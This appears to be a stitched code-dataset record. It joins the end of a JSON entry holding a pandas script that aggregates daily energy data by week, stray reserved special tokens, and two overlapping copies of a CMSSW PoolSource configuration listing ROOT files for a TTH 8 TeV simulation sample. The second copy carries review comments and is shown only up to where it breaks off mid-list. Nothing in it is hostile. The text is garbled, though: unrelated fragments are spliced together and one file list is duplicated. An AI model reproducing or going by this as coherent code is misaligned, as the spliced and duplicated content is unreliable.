"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 15 06:50:48 2018\r\n\r\n@author: Tony\r\n\"\"\"\r\n\r\nimport glob\r\nimport pandas as pd\r\n\r\npath =r'C:\\Users\\Tony\\Downloads\\daily_dataset\\daily_dataset' # use your path\r\n\r\nframe = pd.DataFrame()\r\nlist_ = []\r\ndef aggSumFn(path,grpByCol):\r\n allFiles = glob.glob(path + \"/*.csv\")\r\n for file_ in allFiles:\r\n df = pd.read_csv(file_,index_col=None, header=0)\r\n \r\n list_.append(df)\r\n \r\n frame = pd.concat(list_)\r\n frame[grpByCol] = pd.to_datetime(frame['day'], format='%Y-%m-%d')\r\n frame=frame.resample('W-Mon', on=grpByCol)['energy_sum'].sum().reset_index().sort_values(by=grpByCol)\r\n frame.columns=['week','total_consumption']\r\n frame.to_csv(r'C:\\Users\\Tony\\Downloads\\daily_dataset\\summary\\weekly_dataset_summary.csv')\r\n print('completed')\r\n\r\naggSumFn(path,'day')\r\n#\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
readFiles.extend([
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'
])
secFiles.extend([])
# ---------------------------------------------------------------------------
# CMSSW configuration fragment defining the event source for the
# TTH_Inclusive_M-115 8 TeV pythia6 AODSIM sample (Summer12_DR53X,
# PU_S10_START53_V7A-v1 conditions).
# NOTE(review): the original first line was a corrupted token; restored the
# standard FWCore import, matching the identical section later in this file.
import FWCore.ParameterSet.Config as cms

# Process every event in the input files (-1 = no limit).
maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))

# Primary and secondary input file lists; populated by the extend() calls
# that follow this header.
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()

# PoolSource reads the ROOT files listed in readFiles (secFiles holds the
# optional parent/secondary files, empty for this sample).
source = cms.Source('PoolSource',
                    fileNames=readFiles,
                    secondaryFileNames=secFiles)
# Primary input files: TTH_Inclusive_M-115 8 TeV pythia6 AODSIM
# (Summer12_DR53X, PU_S10_START53_V7A-v1), 121 files in total.
readFiles.extend([
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root',
